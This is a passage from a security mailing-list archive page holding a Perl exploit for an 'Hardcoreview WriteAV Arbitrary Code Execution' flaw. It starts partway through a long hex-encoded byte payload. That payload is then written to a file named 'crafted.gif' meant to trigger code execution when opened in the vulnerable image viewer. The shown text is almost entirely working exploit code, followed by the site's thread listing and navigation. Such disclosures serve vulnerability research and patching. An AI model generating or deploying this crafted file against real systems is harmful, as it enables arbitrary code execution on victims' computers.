"\x77\xB0\xE0\x07\x5C\x2B\xD2\x0D\x5F\x92\xC5\x11\x64\xE0\x05\xEE".
"\xE8\x84\x25\xF6\xF5\x0D\x02\x78\x35\x1F\xE9\x08\x40\x3A\xBA\x11".
"\xD6\x60\x50\x82\x12\xF3\x30\x88\x16\xB4\x10\x00\x2D\xF8\x12\x45".
"\x8B\x11\x4B\x0F\x56\xF0\xD1\x64\x58\x22\x8E\xCC\x08\xC6\x40\x00".
"\xB0\x57\x82\x00\xE0\xAF\x80\x15\x08\x5F\xDB\x8A\xBC\x96\xAC\xEF".
"\x01\x2D\xA0\x02\x0C\x86\x40\x00\x54\x4C\xA2\x13\x22\x0D\x00\x60".
"\x27\x3B\x59\xC9\x4A\x96\xAF\x98\x0D\x6C\x61\x05\xE0\x83\x1F\x0C".
"\x01\x09\x02\x38\x00\x18\x0C\xF0\x0A\x50\xAC\xD1\x17\x7A\x15\xAC".
"\x6A\xFD\x7A\x59\xCB\x0E\x76\xB0\xFF\x24\x0C\x0C\xAC\x40\x05\x2A".
"\xFF\x48\x00\x01\x6C\x90\x03\x25\x48\x01\x0D\x6B\xA0\x76\xB5\x94".
"\x15\x6C\x70\xFF\x6A\xD9\xE2\x08\x40\x08\x3B\x18\xC1\x07\x12\xA0".
"\x01\x26\x9C\x20\x0F\x77\xB8\xC6\x23\x38\x06\x0C\xD7\x16\xD7\xB2".
"\x7D\x70\x2D\x66\xB5\x7B\x10\xD4\x70\x36\x07\x31\x10\x81\x13\xC6".
"\x50\x07\x3E\xE8\xC1\x0E\xA4\xA8\x06\x2F\x4A\x11\x56\xE2\x5A\xB7".
"\x0F\x85\xE0\xEE\x76\x05\xC2\xD6\x82\xB0\xC4\x07\x35\x98\x80\x06".
"\x96\xE0\x04\x07\xE4\x08\x0E\x78\x38\xC4\x20\xEC\x90\x8A\x58\x74".
"\x82\x17\xED\xED\x2B\x6C\x29\x9B\x59\xF7\x16\x04\x08\x24\xB8\x00".
"\x0D\x98\x10\x05\x29\xA4\xC0\x0D\x74\xD8\x07\x1D\xF0\x00\x08\x01".
"\xDB\xC1\x00\xA8\xD0\x2B\x71\x19\xBC\xDD\x11\xB3\xD6\x20\x0A\x68".
"\x6E\x85\xEB\x91\x86\x16\xBB\x01\x0E\xE5\x3D\x04\x20\x04\x01\x08".
"\x3B\xC8\xC2\xBA\xC5\x5D\x70\x6B\x19\x7C\x10\x27\x40\x41\x0A\xF2".
"\xE8\x54\x19\xF8\xD1\x62\x18\xFF\x81\xC6\x87\x30\x84\x21\xF6\xE0".
"\x07\xD5\x66\x77\xBB\x80\x90\xEF\x89\x0B\x32\x86\x32\xD0\xA1\x0C".
"\x69\xE0\x87\x96\xF9\xF1\xE2\x3A\x04\x82\xC6\x1D\x2E\x44\x21\xF6".
"\x20\x07\xCB\x16\xE2\xC9\x7C\xC5\x83\x75\xDD\x4B\x5C\x7F\x18\x24".
"\x33\xCB\x2D\x1E\xF2\x96\x5F\x1C\x09\x44\x0C\x02\x10\x33\x16\x73".
"\x21\xFE\xD0\x64\x42\x14\xE2\x10\xD9\x0D\x00\x21\xFE\xE0\xE6\x42".
"\x0B\xC4\x1F\x6E\x0E\x80\x3F\xCA\xE0\x90\x46\x3B\xFA\xD1\x90\x8E".
"\x34\x41\x02\x02\x00\x3B";

open(C, ">:raw", "crafted.gif");
print C $crafted;
close(C);
 
# http://0xffe4.org


  By Date           By Thread  

Current thread:
  • Hardcoreview WriteAV Arbitrary Code Execution pereira (Oct 09)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]